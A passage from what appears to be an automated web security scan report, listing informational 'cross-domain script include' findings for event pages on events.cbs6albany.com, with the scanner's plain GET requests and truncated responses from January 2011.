<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.194. http://events.cbs6albany.com/norfolk-ct/events/show/164346445-big-shot previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/norfolk-ct/events/show/164346445-big-shot

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /norfolk-ct/events/show/164346445-big-shot HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:44:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 100
ETag: "64e847f590f9dee44bacb04b3fdee023"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:44:48 GMT; HttpOnly
Content-Length: 44624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.195. http://events.cbs6albany.com/norfolk-ct/events/show/164346985-bo-bice previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/norfolk-ct/events/show/164346985-bo-bice

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /norfolk-ct/events/show/164346985-bo-bice HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:45:20 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 103
ETag: "d030f8994c3681906f75ff28e49b5463"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:45:20 GMT; HttpOnly
Content-Length: 44603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.196. http://events.cbs6albany.com/norfolk-ct/events/show/164347045-classic-albums-live-performs-led-zeppelins-houses-of-the-holy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/norfolk-ct/events/show/164347045-classic-albums-live-performs-led-zeppelins-houses-of-the-holy

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /norfolk-ct/events/show/164347045-classic-albums-live-performs-led-zeppelins-houses-of-the-holy HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:45:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 89
ETag: "d1d0067eddd1a917947451911250dcb2"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:45:24 GMT; HttpOnly
Content-Length: 45404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.197. http://events.cbs6albany.com/norfolk-ct/venues/show/1102846-infinity-music-hall-and-bistro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/norfolk-ct/venues/show/1102846-infinity-music-hall-and-bistro

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /norfolk-ct/venues/show/1102846-infinity-music-hall-and-bistro HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:45:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 133
ETag: "f458f777c334f44fa35e8505422e7ba7"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:45:24 GMT; HttpOnly
Content-Length: 51615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.198. http://events.cbs6albany.com/pittsfield-ma/events/show/160788005-lover-youre-killin-me previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/pittsfield-ma/events/show/160788005-lover-youre-killin-me

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /pittsfield-ma/events/show/160788005-lover-youre-killin-me HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:49:56 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 126
ETag: "872d6f3ca83066d188d859d447c3dae3"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:49:56 GMT; HttpOnly
Content-Length: 39618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.199. http://events.cbs6albany.com/saratoga-springs-ny/events/show/163979845-intimate-encounters-for-valentines previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/saratoga-springs-ny/events/show/163979845-intimate-encounters-for-valentines

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /saratoga-springs-ny/events/show/163979845-intimate-encounters-for-valentines HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:00 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 124
ETag: "73fd09c11fc28463d08fc357da863fe5"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:48:00 GMT; HttpOnly
Content-Length: 40890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.200. http://events.cbs6albany.com/schenectady-ny/events/show/163204745-be-my-valentine previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/schenectady-ny/events/show/163204745-be-my-valentine

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /schenectady-ny/events/show/163204745-be-my-valentine HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
